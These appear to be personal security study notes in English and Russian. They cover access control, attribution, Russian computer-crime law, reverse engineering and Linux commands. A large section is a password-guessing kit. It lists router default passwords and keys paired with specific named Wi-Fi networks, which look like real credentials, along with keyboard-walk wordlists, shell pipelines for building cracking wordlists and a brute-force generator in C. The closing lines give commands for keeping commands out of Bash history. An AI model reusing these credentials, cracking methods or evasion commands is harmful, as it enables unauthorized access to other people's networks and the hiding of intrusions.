Null Byte :- heres https://www.youtube.com/channel/UCgTNupxATBfWmfehv21ym-g SecurityFWD :- here https://www.youtube.com/c/SecurityFWD/videos LiveOverflow :- here https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/videos Seytonic :- here https://www.youtube.com/c/Seytonic/videos HackerSploit :- here https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q Hak5 :- here https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ Unkn0wnUser :- here https://www.youtube.com/c/Unkn0wnUser/videos PwnFunction :- here https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A Loi Liang Yang :- here https://www.youtube.com/channel/UC1szFCBUWXY3ESff8dJjjzw OALabs :- here https://www.youtube.com/c/OALabs/videos

• authentication https://thunix.net/~defanor/notes/user-authentication.xhtml
• NIST Digital Identity Guidelines https://pages.nist.gov/800-63-3/sp800-63b.html

Attacks & Defences

• Malware & Attack Technologies - exploits, ditributed malicious systems
• Adversarial Behaviours - malware supply chains, attack vectors, mokney transfers
• Security Operations & Incident Management - securre systems, threat intelligence
• Forensics - collection analysis and reporting of digital evidence

System security

• Operating Systems & Virtualisation sec - sharing of resources, multiuser, database
• Cryptography - protocols that use them
• Formal Methods for Security -
• Hardware Security - Infrastructure security
• Network sec - Infrastructure security
• Authentication, Authorisation & Accountability -
• Distributed Systems sec - secure consensus, time, event systems, peer-to-peer, cloud, multitenant data center
• Web & Mobile sec - Software & Plstform security

Infrastructure security

• Applied Cryptography - application, issues around implementation,key management, use within protocols and systems
• Cyber Physical systems - internet of things & industrial control systems, attacker models, large-scale infrastructures
• Physical Layer and Telecommunications sec - concertns ans limitations of the physical layer, radio frequency encoding, unintended radiation, interference

Software & Plstform security

• software sec - programming errors, sec bugs
• Secure software lifecycle -

Computer access control

• identification - prove person identity
• authorization - approve request by access prolicy
• authentication - verifying that identity
• access approval - requests in session
• audit trail - audit log

resource or object

machine or data.

subject

is an active entity that requests access to a resource or the data within a resource. E.g.: user, program, process etc.

Access

is the flow of information between a subject and a resource.

Access controls

are security features that control how users and systems communicate and interact with other systems and resources.

protection rings

hierarchical protection domains mechanisms to protect data and functionality from faults (by improving fault tolerance) and malicious behavior (by providing computer security).

confused deputy problem

a computer program that is tricked by another program (with fewer privileges or less rights) into misusing its authority on the system. specific type of privilege escalation.

privilege

delegation of authority to perform security-relevant functions on a computer system. automatic, granted, or applied for.

access matrix

subject-resource

unilaterally abrogate

отказ в одностороннем порядке

unilateral [/ˌyo͞onəˈladərəl/]

односторонний

threat model

threats + rule some threats explicitly out of scope. describes the capabilities that an attacker is assumed to be able to deploy against a resource

• separate device with OTP calculator

• discussed as a possible replacement for, as well as an enhancer to, traditional passwords

  • in contrast to static passwords, they are not vulnerable to replay attacks
  • user who uses the same (or similar) password for multiple systems, is not made vulnerable on all of them, if the

  password for one of these is gained by an attacker

• hard token - base for OTP calculator

synchronization may be based on:

• time
• algorithm and previous password
• algorithm and new password is based on a challenge

the principle of least privilege (PoLP) or the principle of minimal privilege (PoMP) or the principle of least authority (PoLA)

• requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user, or a program, depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.

Separation of Duties - Separating any conflicting areas of responsibility so as to reduce opportunities for unauthorized or unintentional modification or misuse of organizational assets and/or information.

Need to know - It is based on the concept that individuals should be given access only to the information that they absolutely require in order to perform their job duties.

https://en.wikibooks.org/wiki/Fundamentals_of_Information_Systems_Security/Access_Control_Systems#Access_Control_Practices

• Information security - practice of protecting information by mitigating information risks. It is part of information risk management.
• Security engineering - process of incorporating security controls into an information system so that the controls become an integral part of the system’s operational capabilities
• Intrusion detection system - device or software application that monitors a network or systems for malicious activity or policy violations. collected centrally using a security information and event management (SIEM) system
  • network intrusion detection systems (NIDS)
  • host-based intrusion detection systems (HIDS)
• Countersurveillance

• Attribution is the art of answering a question: who did it?
• Sine qua non - latin условие, без которого
• The attribution of an attack to a state or state agents is a condicio sine qua non under international law.

• tactical goal - technical aspects, the how
  • What was the intrusion mechanism?
• perational goal - the attack’s high-level architecture and the attacker’s profile — the what
  • What was the motive?
• strategic goal - assessing the attack’s rationale, significance, appropriate response — the who and why.
• communication - communicating the outcome of a labour-intensive forensic investigation

aperture: the scope of sources that can be brought to bear on a specific investigation

http://www.ceae.ru/urids-komp-prestup.htm

Управление "К" МВД РФ и отделы "К" региональных управлений внутренних дел,входящие в состав Бюро специальных технических мероприятий МВД РФ.

общим объектом компьютерных преступлений будет совокупность всех общественных отношений, охраняемых уголовным законом, родовым - общественная безопасность и общ. порядок; видовым - совокупность общественных отношений по правомерному и безопасному использованию информации; непосредственный объект трактуется исходя из названий и диспозиций конкретных статей.

Отсутствие посягательства на эти общественные отношения (либо незначительность такого посягательства) исключает уголовную ответственность в силу ч. 2 ст. 14 УК РФ

гл. 28 УК, которое говорит не о посягательстве на объект, а о посягательствах в определенной "сфере".

Преступлениями в сфере компьютерной информации являются:

1. Неправомерный доступ к компьютерной информации (ст.272 УК РФ);
2. Создание, использование и распространение вредоносных программ для ЭВМ (ст.273 УК РФ);
3. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети (ст.274 УК РФ);

Физическое повреждение или уничтожение компьютерной техники, незаконное завладение ею, а равно машинными носителями (дискетами, CD-R дисками), как предметами, обладающими материальной ценностью, квалифицируются по статьям главы 21 УК РФ

Между деянием и последствиями обязательно должна быть установлена причинная связь.

Субъективная сторона компьютерных преступлений характеризуется умышленной виной.

В ч. 2 ст. 24 сказано, что деяние совершенное по неосторожности признается преступлением только тогда, когда это специально предусмотрено соответствующей статьей Особенной части УК

лицо, имеющее доступ к ЭВМ, системе ЭВМ или их сети.

1. Default passwords
2. key sequence, reverse key sequences
3. personal information
   • name
   • birthday - 1/1/1970 1.1.1970, 1/1/70
   • phone number 89……… or +79………
   • personal number
   • address
   • nicknames
4. space specific: site, company, chat
5. language specific words and universal worlds
6. double 3,4,5 words

password, default, admin, root, guest, year2000, manager, digit, private, D-Link, alpine, telco

• https://www.routerpasswords.com/
• https://github.com/3mrgnc3/RouterKeySpaceWordlists
• TP Link - 8 chars [0-9]
• qtech: 32625585
• hiawei: 07225C45827
• ZTE: eCavtVDe, d21????F
• keenetic: ncKxATQn
  • keenetic-3055:cMHsmdj3
  • keenetic-4345:9mftKELH
  • keenetic-0809:ouzPMWxL
  • Keenetic(ZyXEL): en5Klc55
• ZyXEL Kenetic Giga:pin:51029203
• netis:password
• Wifire-2.4: YFOP7PBM
• WiFi-DOM.ri:KCAmwrPiGH
• Ростелеком:BFW7P3PQ, RT_WiFi_ADE8:v2VKfEyg, RT_WiFi_0E65:Ce2ch5ex
  • RT_Wifi:user:qtech,pass:qtech
  • RT-WIFI QTECH:123456789012
  • RT_WiFi(ZTE CORP):gqYyAaeX
  • ROSTELECOM_(Sagemcom):MCR4F64F
• MTSRouter_(SERCOMM):RRgA9jTF
  • UniversalRouterMTS(Sagemcom):VG97ACNG,admin,mts
  • MTSRouter(D-Link):43621996, MTSRouter(D-Link DIR-615):37674724
  • MTSRouter_2.4G(SERCOMM):8-chan up down alphanumeric
  • MTS_Router_240985-77ed-D-Link_International: 10048566
  • MTSRouter_404E27(D-Link_International):8 chars [0-9]
• MGTS_GPON
  • SERCOMM
    • MGTS_GPON_9921: H6RU5R6P - SERCOMM
    • MGTS_GPON_7901: JMZQ88VZ - SERCOMM
    • 9883: ZCMKTKSS
    • MGTS_GPON_9949 / MGTS_GPON5_9949 : MQK6MNTK
  • zte corporation
    • MGTS_GPON_37E1: 23f3de64
    • MGTS_GPON_3ED2: 8ab8b02f
    • MGTS_GPON_F337 / MGTS_GPON5_F337 : nbNjFWGb
    • MGTS_GPON_4AFE / MGTS_GPON5_4AFE : eft6n7jK
• GPON терминал - ZTE-bc865e: 981428bc
• Beeline(SmartBox turbo+):mnm2xq6x
  • Beeline(SmartBox one):WJmNgmX6AT
• MERCUSYS_:25399653
• (Huawei home router)SUPERONLINE_WiFi:94HTFJTAYMMY
  • VDF-HG532e:WEB:
  • WirelessNet(EchoLife):mgtswifi
  • HUAWEI-v7e9:485754438DF0639D
  • 4G-Mobile-WiFi:e
• UR-325BN: D4BF7F05AF2D
• HGU0C830:624AC830
• D-Ling(DIR-620):pin:1234123412
• ASUS:pin:00343459,pin:38472585
• TRENDnet810_2.4:81031005793,admin,BY6Q3AKD
• ZTE:2sat943s
• ubiquiti networks: ubnt/ubnt, no default WPA pass - must be set up
• AndroidAP: yjru7079

• password, adminadmin, AdminAdmin, passWord, PassWord
• 123, 1234, 12345, 123456, 1234567, 12345678, 123456789
• qwe, qwer, qwert, qwerty, qwertyu, qwertyui, qwertyuio, qwertyuiop
• asd, asdf, asdfg, asdfgh, asdfghj, asdfghjk, asdfghjkl
• zxc, zxcv, zxcvb, zxcvbn, zxcvbnm, zxcvbnm,
• qazqaz, qazqazqaz, wsxwsx, wsxwsxwsx, edcedc, edcedcedc
• 1qaz, 1qaz2wsx, 1qaz2wsx3edc
• qazwsx, qazwsx123, 123qazwsx, qazwsxedc, qazwsxedcrfv
• qazxsw, 123qazxsw, qazxswedc
• abcd, abcde, abcdef, abcdefg, abcdefgh
• 1q2w3e4r5t6y, 1q2w3e4r5t6, 1q2w3e4r5t, 1q2w3e4r5, 1q2w3e4r, 1q2w3e4, 1q2w3e, 1q2w3, 1q2w
• q1w2e3r4t5y6, q1w2e3r4t5y, q1w2e3r4t5, q1w2e3r4t, q1w2e3r4, q1w2e3r, q1w2e3, q1w2e, q1w2
• REP8 4-10: alphabet+spec = aaaaaaaa, bbbbbbbb, 11111111
• PERM2 2-4: 1 2 3 4 5 6 7 8 9 - = = 12121212, 32323232, ----
• PROD 2-3: 123 qwe asd zxc 321 ewq dsa cxz = 123123, 123qwe, qwe123
• PROD 2: 1234 qwer asdf zxcv 4321 rewq fdsa vcxz = 12341234, 1234qwer,
• RARE! REP2: 12345, qwert, asdf, zxcvb, 54321, trewq, fdsa, bvcxz
• PROD2,3: qaz wsx, edc, zaq xsw, cde, 123, 321
• PROD2: 1qaz, 2wsx, 3edc, zaq1, xsw2, cde3
• PROD4: 12, 21, qw, as, zx, wq, sa, xz
• PROD4: 12, 21, po, op, lk, kl, mn, nm
• PAIRS2-4 from: qwertyuiop[], asdfghjkl;', zxcvbnm, (and reverse): qwqwqwqw, wewewewe
• adadadad, asasasas, asas, qeqeqeqe, qeqe, zczc, zczczczc, qeqe, qeqeqeqe
• 1234567a, 123456aa, 1234aaaa, 123aaaa
• a1234567, aa123456, aaa12345, aaaa1234
• 11223344, 1122334455, 111222333, 11112222
• 1234abcd, 12345abcd, 12345abc, 123456abcd, 12345abc, 123456abc
• 123456789a, 1234567a, 1234567b, 12345678b, 1234567c
• a123456789, a1234567, b1234567, b12345678, c1234567
• 789456123, 890567234, 321654987
• qwerty123, qwert123, 123qwerty, qwert123, 12345qwe, 12345qwer, 123456qw
• 1234567890, 123456789, 12345678, 0123456789, 012345678
• 12344321, 123454321, 1234554321
• 1qazxsw2
• 102030405, 102030405, 1020304050, 102030406, 01020304, 0102030405
• 147258369, 741852963, 963852741
• qwaszx, 123qwaszx, qwaszx123, zxasqw, zxasqw123, 123zxasqw
• 1234567891
• 1qazxsw2
• 1029384756, 0192837465, 1092387456, 0129834765
• zaq12wsx
• 0987654321, 098765432, 09876543, 0987654, 098765, 09876, 0987, 098
• !@#$%^&*()_+, !@#$%^&*()_, !@#$%^&*(), !@#$%^&*(, !@#$%^&*

transfer:

1. copy this to file key_sequences

cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' > key_sequences_cap
cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' | tr [:lower:] [:upper:] >> key_sequences_cap
cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' | tr [:upper:] [:lower:] >> key_sequences_cap
cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' | rev >> key_sequences_cap
cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' | rev | tr [:lower:] [:upper:] >> key_sequences_cap
cut -d " " -f2- key_sequences | grep -v -e REP -e PROD -e PERM | sed 's/, /\n/g' | rev | tr [:upper:] [:lower:] >> key_sequences_cap
cat key_sequences_cap | uniq |sed -nr '/^.{8,12}$/p' > key_sequences_cap8-12u

• year, month, date - date, month, year
  • simple
  • 0
  • with/without 0 with special characters as separators .,_,-,/,#
  • without 20 and 19 in year

• divide letters to 1,2,3,4 parts - first, one of, or every second is capital
  • The first letter is a capital letter.
• additional characters
• simple obfuscation or Replacement Password Pattern

• simple - 1, 11, 12, 13, 123, a, q, qq, aa, 0, 00, 01, 2, 3, 7, ., _, !, -, @, *, #, /, $
• double and triple of 1 character simple
• any digital double - 11, 22, 33
• zero + 1 digital: 01,02,03,04
• special numbers - 50,100,1000,300,30,18,7
• english: ',

• a - @
• o - 0
• i/l - 1/|
• s - 5/$
• b/g - 6
• g - 9

cat words | grep -v "^*" | cut -f 2- -d ' ' | sed 's/, /\n/g'

%

• only lower - 41,67
• mixed letters and numeric - 37
• only numeric - 15
• contains special charactes - 3.8
• only upper cases - 1.62

characters % (without ")

• . - 0.7
• _ - 0.58
• ! - 0.55
• - - 0.39
• @ - 0.32
• * - 0.3
• # - 0.18
• / - 0.12
• $ - 0.1
• , - 0.09
• & - 0.088
• ? - 0.08
• + - 0.073
• = - 0.057
• ) - 0.056
• ( - 0.055
• ' - 0.05
• ; - 0.044

• hashcat
• John the Ripper
• PasswordsPro:
• Rsmangler
• crunch

• john rules on name
• one word: all sequences and worlds capitalized and filtered
• most common
• dates
• two words
• john rules on "one word"

old

• key sequence (sequences.txt) + dates
• reverse sequences (sequences_rev.txt)
• sequence words (wordlist_ks) + default passwords
• sequence words (wordlist_ks) + default passwords (upper lower)
• reverse sequence words (wordlist_ks)
• reverse sequence words (wordlist_ks) (upper lower)
• filtered sequence words result (wordlist_ks8)
• all numbers = 8 (alldigits8.txt)
• all numbers = 10 (alldigits10.txt)
• all numbers+A-F - upper, lower, 8, 10, 9
• >8 normal =n.txt
• >8 all lowercase =l.txt
• >8 all uppercase =u.txt
• >8 capitalized
• <5 double normal
• <5 double all lowercase
• <5 double all upper
• <5 double first upper second lower
• <5 double first lowwer second upper

sort by symbols

• cat old-driver-passwords | nl -b a -s : | sort -t : -k 2 -u | cut -d : -f 2- > old-driver-passwords

filter lines 2-8 chars

• grep -E '^.{2,8}$' –color=never infile
• sed -nr '/^.{2,8}$/p' infile
• cat TOP_VK-100M_WPA.txt | grep -o -E '[a-zA-Z]{4,}' | uniq

reverse characters: rev

shuffle and random line: shuf

• < /dev/urandom tr -dc _A-Z-a-z-0-9 | head -c 32 ;echo;
• tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1

strings /dev/urandom | grep -o '[[:alnum:]]' | head -n 30 | tr -d '\n'; echo

• < /dev/urandom tr -dc _A-Z-a-z-0-9 | fold -w8
• dd if=/dev/urandom bs=1 count=32 2>/dev/null | base64 -w 0 | rev | cut -b 2- | rev
• openssl rand -base64 32
• date | md5sum
• date +%s | sha256sum | base64 | head -c 32 ; echo

tmpfs

• mount -t tmpfs -o size=10m tmpfs /tmp/a

• vk https://github.com/tokyoneon/1wordlist/
  • https://null-byte.wonderhowto.com/how-to/use-leaked-password-databases-create-brute-force-wordlists-0184006/

• C++ https://www.quickperm.org/01example.php

// NOTICE:  Copyright 2008, Phillip Paul Fuchs

#define N    12   // number of elements to permute.  Let N > 2


// NOTICE:  Copyright 2008, Phillip Paul Fuchs

void display(unsigned int *a, unsigned int j, unsigned int i) {
   for(unsigned int x = 0; x < N; x++)
      printf("%d ",a[x]);
   printf("   swapped(%d, %d)\n", j, i);
   //getch();  // Remove comment for "Press any key to continue" prompt.
} // display()


void QuickPerm(void) {
   unsigned int a[N], p[N];
   register unsigned int i, j, tmp; // Upper Index i; Lower Index j

   for(i = 0; i < N; i++) {  // initialize arrays; a[N] can be any type
      a[i] = i + 1;   // a[i] value is not revealed and can be arbitrary
      p[i] = 0;       // p[i] == i controls iteration and index boundaries for i
   }
   //display(a, 0, 0);   // remove comment to display array a[]
   i = 1;   // setup first swap points to be 1 and 0 respectively (i & j)
   while(i < N) {
      if (p[i] < i) {
         j = i % 2 * p[i];   // IF i is odd then j = p[i] otherwise j = 0
         tmp = a[j];         // swap(a[j], a[i])
         a[j] = a[i];
         a[i] = tmp;
         display(a, j, i); // remove comment to display target array a[]
         p[i]++;             // increase index "weight" for i by one
         i = 1;              // reset index i to 1 (assumed)
      } else {               // otherwise p[i] == i
         p[i] = 0;           // reset p[i] to zero
         i++;                // set new index value for i (increase by one)
      } // if (p[i] < i)
   } // while(i < N)
} // QuickPerm()




int main(){
  QuickPerm()
}

• https://github.com/Jsdemonsim/Stackoverflow/tree/master/alphabet

// Print all combinations of the given alphabet up to length n.
//
// Example: length 3 combinations are:
//
// aaa
// aab
// aac
// ...
// aa9
// aba
// abb
// abc
// ...
// a99
// baa
// bab
// ...
// 998
// 999
//
// The best way to test this program is to output to /dev/null, otherwise
// the file I/O will dominate the test time.
//
// This is the same as alphabet.c except this version uses 3 hardcoded
// letters instead of 2.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

const char *alphabet = "abcdefghijklmnopqrstuvwxyz"
                       "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                       "0123456789";

static void generate(int maxlen);

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "Usage: %s Length\n", argv[0]);
        exit(1);
    }

    generate(atoi(argv[1]));
    return 0;
}

/**
 * Generates all patterns of the alphabet up to maxlen in length.  This
 * function uses a buffer that holds alphaLen^3 patterns at a time.
 * One pattern of length 5 would be "aaaaa\n".  The reason that alphaLen^3
 * patterns are used is because we prepopulate the buffer with the last 3
 * letters already set to all possible combinations.  So for example,
 * the buffer initially looks like "aaaaa\naaaab\naaaac\n ... aa999\n".  Then
 * on every iteration, we write() the buffer out, and then increment the
 * fourth to last letter.  So on the first iteration, the buffer is modified
 * to look like "abaaa\nabaab\nabaac\n ... ab999\n".  This continues until
 * all combinations of letters are exhausted.
 */
static void generate(int maxlen)
{
    int   alphaLen = strlen(alphabet);
    int   len      = 0;
    char *buffer   = malloc((maxlen + 1) * alphaLen * alphaLen * alphaLen);
    int  *letters  = malloc(maxlen * sizeof(int));

    if (buffer == NULL || letters == NULL) {
        fprintf(stderr, "Not enough memory.\n");
        exit(1);
    }

    // This for loop generates all 1 letter patterns, then 2 letters, etc,
    // up to the given maxlen.
    for (len=1;len<=maxlen;len++) {
        // The stride is one larger than len because each line has a '\n'.
        int i;
        int stride = len+1;
        int bufLen = stride * alphaLen * alphaLen * alphaLen;

        if (len == 1) {
            // Special case.  The main algorithm hardcodes the last two
            // letters, so this case needs to be handled separately.
            int j = 0;
            bufLen = (len + 1) * alphaLen;
            for (i=0;i<alphaLen;i++) {
                buffer[j++] = alphabet[i];
                buffer[j++] = '\n';
            }
            write(STDOUT_FILENO, buffer, bufLen);
            continue;
        } else if (len == 2) {
            // Also a special case.
            int let0 = 0;
            int let1 = 0;
            bufLen = (len + 1) * alphaLen * alphaLen;
            for (i=0;i<bufLen;i+=stride) {
                buffer[i]   = alphabet[let0];
                buffer[i+1] = alphabet[let1++];
                buffer[i+2] = '\n';
                if (let1 == alphaLen) {
                    let1 = 0;
                    let0++;
                    if (let0 == alphaLen)
                        let0 = 0;
                }
            }
            write(STDOUT_FILENO, buffer, bufLen);
            continue;
        }

        // Initialize buffer to contain all first letters.
        memset(buffer, alphabet[0], bufLen);

        // Now write all the last 3 letters and newlines, which
        // will after this not change during the main algorithm.
        {
            // Let0 is the 3rd to last letter.  Let1 is the 2nd to last letter.
            // Let2 is the last letter.
            int let0 = 0;
            int let1 = 0;
            int let2 = 0;
            for (i=len-3;i<bufLen;i+=stride) {
                buffer[i]   = alphabet[let0];
                buffer[i+1] = alphabet[let1];
                buffer[i+2] = alphabet[let2++];
                buffer[i+3] = '\n';
                if (let2 == alphaLen) {
                    let2 = 0;
                    let1++;
                    if (let1 == alphaLen) {
                        let1 = 0;
                        let0++;
                        if (let0 == alphaLen)
                            let0 = 0;
                    }
                }
            }
        }

        // Write the first sequence out.
        write(STDOUT_FILENO, buffer, bufLen);

        // Special case for length 3, we're already done.
        if (len == 3)
            continue;

        // Set all the letters to 0.
        for (i=0;i<len;i++)
            letters[i] = 0;

        // Now on each iteration, increment the the fourth to last letter.
        i = len-4;
        do {
            char c;
            int  j;

            // Increment this letter.
            letters[i]++;

            // Handle wraparound.
            if (letters[i] >= alphaLen)
                letters[i] = 0;

            // Set this letter in the proper places in the buffer.
            c = alphabet[letters[i]];
            for (j=i;j<bufLen;j+=stride)
                buffer[j] = c;

            if (letters[i] != 0) {
                // No wraparound, so we finally finished incrementing.
                // Write out this set.  Reset i back to second to last letter.
                write(STDOUT_FILENO, buffer, bufLen);
                i = len - 4;
                continue;
            }

            // The letter wrapped around ("carried").  Set up to increment
            // the next letter on the left.
            i--;
            // If we carried past last letter, we're done with this
            // whole length.
            if (i < 0)
                break;
        } while(1);
    }

    // Clean up.
    free(letters);
    free(buffer);
}

https://www.codementor.io/@packt/reverse-engineering-a-linux-executable-hello-world-rjceryk5d

objdump -d hello > disassembly.asm

• AT&T disassembly syntax

objdump -M intel -d hello > disassembly.asm

should be done in a sandbox environment

• trace
  • hows a readable code of what the program did
  • logged library functions that the program called and received
• strace
  • logs system calls
    • execve runs a program pointed to by the filename
    • open and read are system calls that are used here to read files
    • mmap2, mprotect, and brk are responsible for memory activities such as allocation, permissions, and segment boundary setting

https://en.wikipedia.org/wiki/X86_assembly_language

consists of a series of

• mnemonic processor instructions - consist of an opcode mnemonic followed by an operand, which might be a list of data, arguments or parameters
• meta-statements (known variously as
  • declarative operations
  • directives
  • pseudo-instructions
  • pseudo-operations
  • pseudo-ops
• comments
• data

Parity bit - error detecting code

data sizes −

• Word: a 2-byte data item
• Doubleword: a 4-byte (32 bit) data item
• Quadword: an 8-byte (64 bit) data item
• Paragraph: a 16-byte (128 bit) area
• Kilobyte: 1024 bytes
• Megabyte: 1,048,576 bytes

fetch-decode-execute cycle or the execution cycle:

• The processor may access one or more bytes of memory at a time
• The processor stores data in reverse-byte sequence
• steps:
  • Fetching the instruction from memory
  • Decoding or identifying the instruction
  • Executing the instruction

two kinds of memory addresses

• Absolute address - a direct reference of specific location.
• Segment address (or offset) - starting address of a memory segment with the offset value.

• Intel syntax - x86 assembly language - dominant in the DOS and Windows world
• AT&T syntax is dominant in the Unix world

• Replay attack network attack in which a valid data transmission is repeated or delayed
  • possibly as part of a spoofing attack by IP packet substitution
  • prevented with session id/token
• spoofing attack
• Denial-of-service attack (DoS)
• Man-in-the-middle attack - alters the communications

TODO expliot

• injection

На первом происходит компрометация доступных из Интернета устройств через использование уязвимостей нулевого дня. Получив доступ, злоумышленники загружают на взломанные устройства вредоносное ПО.

• 0-day уязвимостей и целевых атак

На втором этапе с помощью сетевого сканирования выявляются уязвимые устройства уже во внутренней сети жертвы. Этап позволяет оценить ценность доступных целей и выбрать дальнейшую тактику атаки.

На третьем этапе взломанные устройства используются для рассылки целевых фишинговых писем сотрудникам организации, что дополнительно повышает эффективность атаки.

• all attacks https://portswigger.net/kb/issues

TOTDO:

• BackBox
• Hping
• Metasploit Project - payloads
• Nessus - payloads
• Nmap
• SAINT
• w3af - payloads
• OpenVAS - payloads https://github.com/greenbone/openvas-scanner
  • GPL - C
  • German web site

• .desktop file
  • Exec=19

• scraping
• parsing data
• automated pentesting
• unit testing through selenium - framework, automating tests for web applications across diversified platforms as well as browsers
• Credential stuffing

pwd

Print working directory, i.e., display the name of my current directory on the screen.

hostname

Print the name of the local host (the machine on which I am working). Use netconf (as root) to change the name of the machine.

whoami

Print my login name.

id

Print user id (uid) and his/her group id (gid), effective id (if different than the real id) and the supplementary groups.

date

Print the operating system current date, time and timezone. For an ISO standard format, I have to use date -Iseconds. I can change the date and time to 2000-12-31 23:57 using the command date 123123572000 or using these two commands (easier to remember):

• date -set 2000-12-31 To set the hardware (BIOS) clock from the system (Linux) clock, I can use the command (as root) setclock. The international (ISO 8601) standard format for all-numeric date/time has the form: 2001-01-31 (as in Linux default "C" localization). You can be more precise if you wish using, for example: 2001-01-31 23:59:59.999-05:00 (representing I millisecond before February 2001, in a timezone which is 5 hours behind the Universal Coordinated Time (UTC)) . The most "kosher" representation of the same point in time could be: 20010131T235959,999-0500. See the standard at ftp://ftp.qsl.net/pub/g1smd/8601v03.pdf.
• date -set 23:57:00

time

Determine the amount of time that it takes for a process to complete + other process accounting. Don't confuse it with the date command (see previous entry). E.g. I can find out how long it takes to display a directory content using: time ls. Or I can test the time function with time sleep 10 (time the commands the does nothing for 10 seconds).

clock and hwclock

(two commands, use either). Obtain date/time from the computer hardware (real time, battery-powered) clock. You can also use one of this commands to set the hardware clock, but setclock may be simplier (see command above). Example: hwclock -systohc -utc sets the hardware clock (in UTC) from the system clock.

who

Determine the users logged on the machine.

w

Determine who is logged on the system, find out what they are doing, their processor ussage, etc. Handy security command.

• rwho -a (=remote who) Determine users logged on other computers on your network. The rwho service must be enabled for this command to run. If it isn't, run setup (RedHat specific) as root to enable "rwho".

last

Show listing of users last logged-in on your system. Really good idea to check it from time to time as a security measure on your system.

lastb

("=last bad") Show the last bad (unsuccessful) login attempts on my system. It did not work on my system, so got it started with: touch /var/log/btmp

• "There's a good reason why /var/log/btmp isn't available on any sane set-up - it's a world-readable file containing login mistakes. Since one of the most common login mistakes is to type the password instead of the username, /var/log/btmp is a gift to crackers." (Thanks to Bruce Richardson). It appears the problem can be solved by changing the file permissions so only root can use "lastb":
• chmod o-r /var/log/btmp

history | more

Show the last (1000 or so) commands executed from the command line on the current account. The "| more" causes the display to stop after each screen-full. To see what another user was doing on your system, login as "root" and inspect his/her "history". The history is kept in the file .bash_history in the user home directory (so yes, it can be modified or erased).

uptime

Show the amount of time since the last reboot.

ps

(="print status" or "process status") List the processes currently run by the current user.

ps axu | more

List all the processes currently running, even those without the controlling terminal, together with the name of the user that owns each process.

top

Keep listing the currently running processes on my computer, sorted by cpu usage (top processes first). Press <Ctrl>c when done.

PID = process identification. USER = name of the user who owns (started?) the process. PRI = priority of the process (the higher the number, the lower the priority, normal 0, highest priority is -20, lowest 20. NI = niceness level (i.e., if the process tries to be nice by adjusting the priority by the number given). The higher the number, the higher the niceness of the process (i.e., its priority is lower). SIZE = kilobytes of code+data+stack taken by the process in memory. RSS = kilobytes of physical (silicon) memory taken. SHARE = kilobytes of memory shared with other processes. STAT = state of the process: S-sleeping, R-running, T-stopped or traced, D-uniterruptable sleep, Z=zombie. %CPU = share of the CPU usage (since last screen update). %MEM = share of physical memory. TIME = total CPU time used by the process (since it was started). COMMAND = command line used to start the task (careful with passwords, etc., on command line, all permitted to run "top" may see them!

gtop, ktop and htop

(in X terminal) Three GUI choices for top. My favourite is gtop (comes with gnome). In KDE, ktop is also available from the "K"menu under "System"-"Task Manager".

uname -a

(= "Unix name" with option "all") Info on your (local) server. I can also use guname (in X-window terminal) to display the info more nicely.

Xorg -version

Show me the version of X windows I have on my system.

cat /etc/issue

Check what distribution you are using. You can put your own message in this text file - it's displayed on login. It is more common to put your site-specific login message to the file /etc/motd ("motd"="message of the day").

free

Memory info (in kilobytes). "Shared" memory is the memory that can be shared between processes (e.g., executable code is "shared"). "Buffered" and "cashed" memory is the part that keeps parts of recently accessed files - it can be shrunk if more memory is needed by processes.

df -h

(=disk free) Print disk info about all the filesystems (in human-readable form).

du / -bh | more

(=disk usage) Print detailed disk usage for each subdirectory starting at the "/" (root) directory (in human legible form).

cat /proc/cpuinfo

Cpu info - shows the content of the file cpuinfo. Note that the files in the /proc directory are not real files - they are hooks to look at information available to the kernel.

cat /proc/interrupts

List the interrupts in use. May need to find out before setting up new hardware.

cat /proc/version

Linux version and other info.

cat /proc/filesystems

Show the types of filesystems currently in use.

cat /etc/printcap |more

Show the setup of printers.

lsmod

(= "list modules". As root. Use /sbin/lsmod to execute this command when you are a non-root user.) Show the kernel modules currently loaded.

set|more

Show the current user environment (in full). Normally too much to bother.

echo $PATH

Show the content of the environment variable PATH. This command can be used to show other environment variables as well. Use set to see the full environment (see the previous command).

dmesg | less

Print kernel messages (the content of the so-called kernel ring buffer). Press "q" to quit "less". Use less /var/log/dmesg to see what "dmesg" dumped into this file right after the last system bootup.

chage -l my_login_name

See my password expiry information.

quota

See my disk quota (the limits of disk usage).

sysctl -a |more

Display all the configurable Linux kernel parameters.

runlevel

Print the previous and current runlevel. The output "N5" means: "no previous runlevel" and "5 is the current runlevel". To change the runlevel, use "init", e.g., init 1 switches the system to a single user mode.

• Runlevel is the mode of operation of Linux. Runlevel can be switched "on the fly" using the command init. For example, init 3 (as root) will switch me to runlevel 3. The following runlevels are standard: 0 - halt (Do NOT set initdefault to this) 1 - Single user mode 2 - Multiuser, without NFS (The same as 3, if you do not have networking) 3 - Full multiuser mode 4 - unused 5 - X11 6 - reboot (Do NOT set initdefault to this)

The system default runlevel is set in the file: /etc/inittab.

• history -r clear the Bash history of the current session only
• $ unset HISTFILE Don’t save commands in Bash history for current session
• history -dw 352 Remove a certain line from Bash history
• echo "discreet";history -d $(history 1) - execute command without saving to history

